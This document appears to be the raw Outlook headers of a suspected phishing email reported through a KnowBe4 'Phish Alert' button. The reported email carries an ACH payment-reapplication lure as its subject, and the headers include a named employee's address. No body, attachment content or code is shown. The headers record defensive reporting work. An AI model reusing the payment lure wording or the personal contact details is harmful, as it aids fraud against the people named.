                                                                DKIM-Signaturev=1; a=rsa-sha256; c=relaxed/relaxed; d=metalusinc.onmicrosoft.com; s=selector1-metalusinc-onmicrosoft-com; h=From:Date:Subject:Message-ID:Content-Type:MIME-Version:X-MS-Exchange-SenderADCheck; bh=rtVNiQmq11IKLDz074jyrvGzWvWzREY0qWAYOrQOdto=; b=4RQD4Ic9I118FWLsBk61o5zro2aERPtTEMuZ4hOrSK8f+B767tBZlonMNPVhfUUcuyBifV1tK4R09BY0k78icPQ4jhR+YOQVcsin6XhjOA0URyF5Oh072ZkdNAiMV0UD5scOQheY1tThbfOtQ9LxVWSKehacKoAdaPUS16Iv41I=
                                                                From"Laurence Brochu, CRHA" <laurence.brochu@metalus.qc.ca>
                                                                To"c9025caf-ebfb-4a55-8a88-3cf1915dac7c@ca.phisher.knowbe4.com" <c9025caf-ebfb-4a55-8a88-3cf1915dac7c@ca.phisher.knowbe4.com>
                                                                Subject[Phish Alert] Metalus ACH PAYMENT REAPPLICATION ACCOUNT #8c54702006c6e13e9d9945016292c10c
                                                                Thread-Topic[Phish Alert] Metalus ACH PAYMENT REAPPLICATION ACCOUNT #8c54702006c6e13e9d9945016292c10c
                                                                Thread-IndexAQHbGLNUuy27s7piB0isKo7bKxTuC7J7NXCj
                                                                DateMon, 07 Oct 2024 12:21:22 +0000
                                                                Message-ID <YTBPR01MB3149735B35216BAFE82331C9B57D2@YTBPR01MB3149.CANPRD01.PROD.OUTLOOK.COM>
                                                                References<76282a66-b0ca-58a2-0ce4-daf034fbbd88@pibsi.de>
                                                                In-Reply-To<76282a66-b0ca-58a2-0ce4-daf034fbbd88@pibsi.de>
                                                                Accept-Languagefr-FR, fr-CA, en-US
                                                                Content-Languageen-US
                                                                X-MS-Has-Attachyes
                                                                X-MS-TNEF-Correlator
                                                                authentication-resultsdkim=none (message not signed) header.d=none;dmarc=none action=none header.from=metalus.qc.ca;
                                                                x-ms-publictraffictypeEmail
                                                                x-ms-traffictypediagnosticYTBPR01MB3149:EE_|QB1PPF75FF2F311:EE_
                                                                x-ms-office365-filtering-correlation-idaa7a1f04-aa32-4364-77f3-08dce6ca8e86
                                                                x-ms-exchange-atpmessagepropertiesSA
                                                                x-ms-exchange-senderadcheck1
                                                                x-ms-exchange-antispam-relay0
                                                                x-microsoft-antispam BCL:0;ARA:13230040|376014|1800799024|366016|3613699012|38070700018;
                                                                x-microsoft-antispam-message-info MEJbWCcfRVphrzxan02+gvD+YdKNb1HtD2Prc2Scq96xgDFAkJbDYi7ItwMlBJIh8EfG4YcTQl1rZZ9V5P3bBM1r7iCmRxVokA39Esf2XDCJZ1xQA4/wEju8/6H3T4nkH3CGWmFXUT3al+IDSp6ij3N2y5Spsc+vlJ48DPyIRw/asVbEpM0beNq0dFE+aQpjWfyyhVNWfZir82UsQAGCxvZCYDxFFIckxYviJplIN0fgBVpFhgeiQVDtdl7OhnDcyeIS5iOnK3dtiDDiIgWSUMybuGg+75ImmJDJAZCoVar4KNTc8x7ZhWDMYaq+gICSB03bGyIkH/ZQImc6v2PkSd3PbhpYbJE/jon1MvroOzc2HVfv+ZTvIksAxY7+ECmPKvZiCn2lSr/FQ3Y7x8umeXLqvOhsN2V2XvmnkpSr6lEqnFN1I/x0oy9CrOFjgY5Nu/o05oSfK4POTxGukPs3V64rRa11APqASxWDsX3LwsMQPk1LzndBj1i4WfsAjVq2EKkkEQrzueDaiBk9DYEj0D8h5/wsYC9YDEyStldOAAnlrOfw3UiAxGCxxiY21/oSy1OWLiLHr5qQfCrT0237IVX0Th32erNGSY8u3s9oQLo/swGTPySdqRPks1yihWwwP989M4ZbKoay5pbzvLHn6GOyGt1R6LA3YpOdH8yrev5pPvzDe/8EjXjkqji90007bYRi8Ua7+yrwcdKhKEMW291+ekysw3aj/FFvSaNsNUqGJKbCk2JJRt9/WsXQ4RCObOQdDaS8xL/iEp3xw7dcrPqMSYUTtZsG07Wxl6JtIul1jYH1QXg7QFCMXu7dCFaDmqIefEPvdmbU/6gLonaqDAY9E4KPK5mL4mSJY2cnH32vHO+JiZDrmny8v/bDHObu5dEFPleNyPIyHYdFGmjyZ+F0RVnDPqK8EUWfiBWO/Uz2itdJP3I8RoeGwRYYzu44YfyEfTqJW7Pcyp4Nl2Wkxtnv6bQx8GF9cPodfCdv3w9pWes2l9Du/bFGAH8i2kRukS6FomgFw5w91wtWN61IjmRz22uKYBXZoyM4oslo07kb4Kjbe/Fn0WG4gqqmxVGQYLTrEvxaaG087G2eTevNRMF1y1UPtWj5tDGgMrSC/1/t+FhuvOMu6/k3La6dSmbt+KkAp2Oj4LzEmYhWZfYdmIc31P0hcSBCUOypbMKvHzmgpfj/oNNCPzrsIUlUsCNFowhda/j3Y/p5LB0SvpiH4SS/t5/Kr+SYqZMznkTwbCNB5JMlXVlGGl73FMAfDNjFfeD/UTVm4rdOa4NnCAhRo74Kq1wKxSYJQURNiQxU0S7uHKRYCbPm0E8ZXhv/WPq+
                                                                x-forefront-antispam-report CIP:255.255.255.255;CTRY:;LANG:fr;SCL:1;SRV:;IPV:NLI;SFV:NSPM;H:YTBPR01MB3149.CANPRD01.PROD.OUTLOOK.COM;PTR:;CAT:NONE;SFS:(13230040)(376014)(1800799024)(366016)(3613699012)(38070700018);DIR:OUT;SFP:1102;
                                                                x-ms-exchange-antispam-messagedata-chunkcount1
                                                                x-ms-exchange-antispam-messagedata-0 IR4DWkTGN7WvXayLWlSfjsL10OxMV79ciqkNdfaknBusPhLucfVO919Mx1FeJRDZdXjJIh6gve+4QGgr1rbjDoemcbMg5k9wKdLswm43CRIRDHRYLaCPfaEnjl5DWFGQQ8Vv2L5xhUKbfP//uDGXp9NhNXIRrSRXnaK/+/ueocoGczi6N/1iklYzWQWm8K+HzruoJfpEQYz65N9pZwe8YNLCr7I7pwQ2rPpkPsyS+BccdL7gTx9wPCAVfWSq46jz0STw0utWKZys0B5wIE3/aKWP4KvV+wfeWa/EUkEA4LpQq3+KLwShR/tKOpWpmKJfa4HxDgzIR1t6bbl6Pm5mK6TH/YGaGF+wYKh9lGAzzAXCbfamgmZMGaqG6m43khFWkCVf/200ciw7qF00m4VND86Pm6eqwv4/CDcNgcTzDrEHSWx96lLgFERDrPMzpb5jf5rPDG15k6LevHKXZXEORPkblKB1Nfw2EduO+3UVHRQqN9N6T4xea2RZchJu+gwXGzylhzGRo5z9CPy/0+Z9rLnrnwcdIFf/yl/TFVOqs+DgRtjq0zB1jQOg/BVTl4CfOE5wEPt47ShHt4F3075aw3owvBzBWqRV4rCgDCBmRCOV7ZXKdvtleK3A6VjVCSbt4s6YWpK+PYu1vI1CbqTUiDRlWAHeg66Z6ffWrjldSxYqSD1RPxjPpSHzE4dpi9NuuV44spQAje5woshc1Bj3ctw8QgBS5bENk0qg15Efra/QO1Pwy1TtYuDSYi32KrOrHbBhdl3jU+/qJo878zmK+ZTPTCsRYBvgzYnGgytLTJ2VjDbXyGd+iLm3nQL6COABHU2etePEhDNdt1A3oJS6cCKSZsQW4FgEjouK9awrYD08iz0sJ53Oyuv3w8d/tfV1K1pTn4DiZM6Az9IUELV9x0FajXY2KBCzdS3ig+qOw7v9XaKTVvZ9tmsHBURbezfjdSyg6SWNIRBgHOzRZF3aA9yLK1p09/CINqIsSe/ekQeiQ/7nrPaK70ovSqfy8p8m5UDCNdz3be/w+cLy36EexPg/riAVDw2b3K8vejxWzVGrDuDND+u2AewTewiMHfu3vXLsL9LpIhwxpHG0fmL30I4oFNoU3FIz2+zGNXo9DRDnW46UT6wb9uuTx0wyQtoAB7hUFqy12u9HB2xVwCVjjYPva42ODEFeEcvR/20xpf9ly01Hg455Bb2hSRarBJ5fTkirgSMLJqBceM/nFsWNffa3CCFESFRhVmEdyWQbghCVDfPUTlG7fDzJ9N/gWPQRmImRycWDtlyxLu3hNJdXMvgkypls/a3kMqJ+K9eUEFzQAD5HIhvPOmTk4d4sMkv61k4w5355vEFQjh0hcRtCmpjjbnPGj6GqeQYQ+qfuCs1E1gcCDQaCfjvNJQcMJY85UiR4xVyCn41Vjkf+z5OhgunlJZlj/eKW+z4pECLXN0OVb+2X+Q4zjsa0CXJXdZsjSPhF7UQsnnAecITUhs+3LNoIMGDzqKGuoS1PGJaLFPD7d0oounrScj+dVDjyA8HyAcjHBmJFxRxytUVMPM0Gs56dXkARlOd7MjOGxavBX1lYIPcc4eSL7JkQYv4fTuUbrI+/E/kDpMndiVRQ53b3+w==
                                                                Content-Typemultipart/mixed; boundary="_003_YTBPR01MB3149735B35216BAFE82331C9B57D2YTBPR01MB3149CANP_"
                                                                MIME-Version1.0
                                                                X-OriginatorOrgmetalus.qc.ca
                                                                X-MS-Exchange-CrossTenant-AuthAsInternal
                                                                X-MS-Exchange-CrossTenant-AuthSourceYTBPR01MB3149.CANPRD01.PROD.OUTLOOK.COM
                                                                X-MS-Exchange-CrossTenant-Network-Message-Idaa7a1f04-aa32-4364-77f3-08dce6ca8e86
                                                                X-MS-Exchange-CrossTenant-originalarrivaltime07 Oct 2024 12:21:22.8284 (UTC)
                                                                X-MS-Exchange-CrossTenant-fromentityheaderHosted
                                                                X-MS-Exchange-CrossTenant-id4f85cc14-eaa8-4e0b-8291-93aab6969f78
                                                                X-MS-Exchange-CrossTenant-mailboxtypeHOSTED
                                                                X-MS-Exchange-CrossTenant-userprincipalnameumjjk5MiJdalzSq42YGAvxOv+wm0bG9MA49SvtCOVUnpFcaTvIQqXlzINdbClBJ+mDfJD3vIaqmlF0WedJJv2i4gbYt4jPpouuW6Kt23bPo=
                                                                X-MS-Exchange-Transport-CrossTenantHeadersStampedQB1PPF75FF2F311

                                                                Icon Hash:46070c0a8e0c67d6